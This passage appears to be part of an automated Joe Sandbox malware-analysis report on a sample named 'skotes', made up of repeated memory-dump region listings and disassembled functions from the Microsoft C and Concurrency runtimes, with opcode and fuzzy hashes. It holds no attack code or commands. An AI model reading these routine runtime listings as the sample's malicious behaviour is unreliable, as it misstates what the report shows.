                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                          • String ID:
                                                          • API String ID: 3403738998-0
                                                          • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                          • Instruction ID: 6abea6320c08a2b59079219fa2491367c30035b791c9c9bb4c73eb2ee44c9b3a
                                                          • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                          • Instruction Fuzzy Hash: E6515170A00219AFDF08EF94C495BEEB3A8FF08304F044169E915AB2C2DB34AE55DF90
                                                          APIs
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00C153A0
                                                          • type_info::operator==.LIBVCRUNTIME ref: 00C153C7
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00C154D3
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00C155AE
                                                          • CallUnexpected.LIBVCRUNTIME ref: 00C15650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 4162181273-393685449
                                                          • Opcode ID: 6878b8c9bdcbd348e27c96897c9f98177b6d721ffdb84f2e12ad65439bb5cba4
                                                          • Instruction ID: d084d4b8bb7b13d1ff698bf3d6196338531f40adb0f4c0ee359ebc90c3b2556c
                                                          • Opcode Fuzzy Hash: 6878b8c9bdcbd348e27c96897c9f98177b6d721ffdb84f2e12ad65439bb5cba4
                                                          • Instruction Fuzzy Hash: 6EC19C71900609DFCF29DF94C8809EEBBB6FF96311F50415AF8216B212C771DA92EB91
                                                          APIs
                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00C073B0
                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00C073F2
                                                          • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00C0740E
                                                          • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00C07419
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C07440
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                          • String ID: count$ppVirtualProcessorRoots
                                                          • API String ID: 3897347962-3650809737
                                                          • Opcode ID: 724d7cfd6d04210c155a8c779c21c1497fd8e875e7f7a4020c75dcdecf935eb9
                                                          • Instruction ID: 3f9585432abd00e036e710a8efebda9b49a262f6ae173bf260d37f7b85e09518
                                                          • Opcode Fuzzy Hash: 724d7cfd6d04210c155a8c779c21c1497fd8e875e7f7a4020c75dcdecf935eb9
                                                          • Instruction Fuzzy Hash: C5217E34E00209AFCB14EFA9C495AADBBB5BF09300F1441A9E911A73A1CB30AE05DF90
                                                          APIs
                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C07903
                                                            • Part of subcall function 00C05CB8: __EH_prolog3_catch.LIBCMT ref: 00C05CBF
                                                            • Part of subcall function 00C05CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C05CF8
                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C0792A
                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00C07936
                                                            • Part of subcall function 00C05CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00C05D70
                                                            • Part of subcall function 00C05CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00C05D7E
                                                          • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00C07982
                                                          • Concurrency::location::_Assign.LIBCMT ref: 00C079A3
                                                          • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00C079AB
                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00C079BD
                                                          • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00C079ED
                                                            • Part of subcall function 00C0691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00C06942
                                                            • Part of subcall function 00C0691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00C06965
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                          • String ID:
                                                          • API String ID: 1475861073-0
                                                          • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                          • Instruction ID: 87fd99b1bc44c226aeab8849fbeecabd19803d24aef5e1f9716d196569891f3e
                                                          • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                          • Instruction Fuzzy Hash: FE313630F08255ABCF1EAB7844927FE77B59F41300F0442A9D4A5D72C2DB256E0AD791
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00C14877
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00C1487F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00C14908
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00C14933
                                                          • _ValidateLocalCookies.LIBCMT ref: 00C14988
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 2f7695034e0f2b5905af6659e0355154fab81ac4d2846a8a31244d173df68781
                                                          • Instruction ID: e9ed71dd1590813e61a0a762d17aae6a1c4b4ef5a7410c8c2741df9adaa2db07
                                                          • Opcode Fuzzy Hash: 2f7695034e0f2b5905af6659e0355154fab81ac4d2846a8a31244d173df68781
                                                          • Instruction Fuzzy Hash: 7041E634A00208DFCF14DF68D885ADE7BB8BF46324F148155F8249B392C731DA96EB91
                                                          APIs
                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00C0DD91
                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00C0DDAE
                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00C0DE14
                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00C0DE29
                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00C0DE3B
                                                          • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00C0DE4B
                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00C0DE74
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
